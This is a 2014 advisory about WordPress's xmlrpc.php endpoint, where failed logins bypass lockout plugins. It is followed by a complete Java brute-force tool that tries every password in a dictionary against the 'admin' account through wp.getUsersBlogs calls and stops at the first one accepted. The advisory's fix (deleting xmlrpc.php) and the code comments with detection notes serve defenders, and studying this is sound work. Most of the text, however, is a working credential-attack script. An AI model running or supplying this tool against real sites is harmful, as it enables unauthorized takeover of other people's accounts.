WordPress xmlrpc.php brute force vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62201452077
Type myhack58
Reporter 佚名
Modified 2014-08-04T00:00:00


WordPress is a very popular open-source blog platform. It provides a remote POST interface through the file xmlrpc.php, and an xmlrpc vulnerability in it was disclosed recently. The principle is that authentication through xmlrpc, even when it fails, is not recorded by the security plugins installed on WordPress, so the "password wrong N times, then locked" rule is never triggered. Brute force is therefore possible, and if the password is a weak one, this is quite dangerous. The simplest fix is to delete the file xmlrpc.php. Apart from that, I wrote a brute-force script in Java; it simply takes various user names and passwords, keeps calling xmlrpc.php, and checks the authentication result - nothing complicated. This is just for entertainment; brute forcing is something everyone should be careful about.

The source code of Xmlrpc.java is as follows:

package com.yeetrack.security.wordpress;

import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.testng.annotations.Test;
import java.io.*;

/**
 * Created by victor wang on 2014/8/2.
 * Proof of concept from the advisory: tries a password dictionary against a WordPress
 * site through xmlrpc.php.
 *
 * Why it works, as the advisory describes it: credentials sent to the XML-RPC endpoint are
 * checked by WordPress, but a failed attempt does not go through the normal login form,
 * so lockout plugins that count failures there never see it and the
 * "N wrong passwords -> locked" rule is never triggered.
 *
 * Defensive notes: delete or block access to xmlrpc.php when it is not needed (the
 * advisory's suggested fix); otherwise rate-limit the endpoint and enforce strong
 * passwords. In web-server logs a run of this tool shows up as a burst of POST requests to
 * /xmlrpc.php from one client, each carrying a wp.getUsersBlogs method call (see forceLogin),
 * preceded by a single GET to the same path (see checkXmlRpcFile).
 */
public class Xmlrpc {
    // Browser-like User-Agent attached to every request (also set on the shared client).
    private String userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0";
    // Four-second connection-request, connect and socket timeouts for every request.
    RequestConfig requestConfig = RequestConfig.custom()
            .setConnectionRequestTimeout(4000)
            .setConnectTimeout(4000)
            .setSocketTimeout(4000)
            .build();
    private static Logger logger = LoggerFactory.getLogger(Xmlrpc.class);
    // One client shared by all requests; it is never closed in this class.
    private CloseableHttpClient httpClient = HttpClients.custom()
            .setUserAgent(userAgent)
            .setDefaultRequestConfig(requestConfig)
            .build();

    /**
     * Checks whether the site exposes xmlrpc.php: issues a GET and looks for the fixed
     * banner WordPress returns when the endpoint is requested with anything but POST.
     *
     * @param domain host name or URL; normalised by wrapperUrl
     * @return true when the response body contains the XML-RPC banner
     *         NOTE(review): if execute() throws, resultString stays null and the final
     *         contains() call dereferences it; the response is also never closed.
     */
    private boolean checkXmlRpcFile(String domain) {
        domain = wrapperUrl(domain);
        if (domain == null) return false;
        HttpGet get = new HttpGet("http://" + domain + "/xmlrpc.php");
        get.addHeader("User-Agent", userAgent);
        CloseableHttpResponse response = null;
        String resultString = null;
        try {
            response = httpClient.execute(get);
            // Comparing the response object with "" is never true; presumably meant as an
            // empty-response guard alongside the null check.
            if (null == response || response.equals("")) return false;
            resultString = EntityUtils.toString(response.getEntity());
        } catch (IOException e) {
            e.printStackTrace();
        }
        return resultString.contains("XML-RPC server accepts POST requests only.");
    }

    /**
     * Sends one credential pair to the endpoint as a wp.getUsersBlogs XML-RPC call and
     * reports whether it was accepted.
     *
     * @param username account name to try
     * @param password candidate password
     * @param url      site URL; normalised by wrapperUrl
     * @return true when the response body contains "isAdmin", which only a successful
     *         authentication returns; false on any failure or exception
     *         NOTE(review): the response is never closed, and all three exceptions are
     *         only printed.
     */
    private boolean forceLogin(String username, String password, String url) {
        //try to login
        HttpPost post = new HttpPost("http://" + wrapperUrl(url) + "/xmlrpc.php");
        post.addHeader("User-Agent", userAgent);
        // The method call body; username and password are spliced in unescaped, so values
        // containing XML metacharacters would produce a malformed request.
        String xmlString = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>" + username + "</value></param> <param><value>" + password + "</value></param> </params></methodCall>";
        StringEntity entity = null;
        try {
            entity = new StringEntity(xmlString);
            post.setEntity(entity);
            CloseableHttpResponse response = httpClient.execute(post);
            String loginResult = EntityUtils.toString(response.getEntity());
            if (null == loginResult || loginResult.equals("")) return false;
            if (loginResult.contains("isAdmin")) {
                logger.info(url + "login successful, userename--->" + username + " password--->" + password);
                return true;
            }
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        } catch (ClientProtocolException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
        return false;
    }

    /**
     * Normalises a URL to a bare host: strips a leading "http://" and anything from the
     * first "/" onwards.
     *
     * @param url host name or URL
     * @return the host part, or null for a null or empty input
     */
    private String wrapperUrl(String url) {
        if (null == url || url.equals("")) return null;
        if (url.startsWith("http://")) url = url.substring(7);
        if (url.contains("/")) url = url.substring(0, url.indexOf("/"));
        return url;
    }

    /**
     * Entry point of the proof of concept, run as a TestNG test: verifies the endpoint is
     * present, then tries every line of the password dictionary for the user "admin" and
     * stops at the first accepted one. The target URL and dictionary path are the
     * placeholders from the advisory.
     * NOTE(review): the reader is never closed, and any exception only ends the loop.
     */
    @Test
    public void test() {
        String url = "http://somewordpress.com/xmlrpc.php";
        if (!checkXmlRpcFile(url)) {
            logger.info(url + "--->does not exist xmlrpc vulnerability");
            return;
        }
        // The password dictionary; the advisory notes these are plentiful online or can be generated.
        File file = new File("src/main/resources/1pass00.txt");
        try {
            FileReader fileReader = new FileReader(file);
            BufferedReader bufferedReader = new BufferedReader(fileReader);
            String line = null;
            int count = 1;
            while ((line = bufferedReader.readLine()) != null) {
                System.out.println("" + count + "" + line);
                if (forceLogin("admin", line, url)) break;
                count++;
                //Thread.sleep(500);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
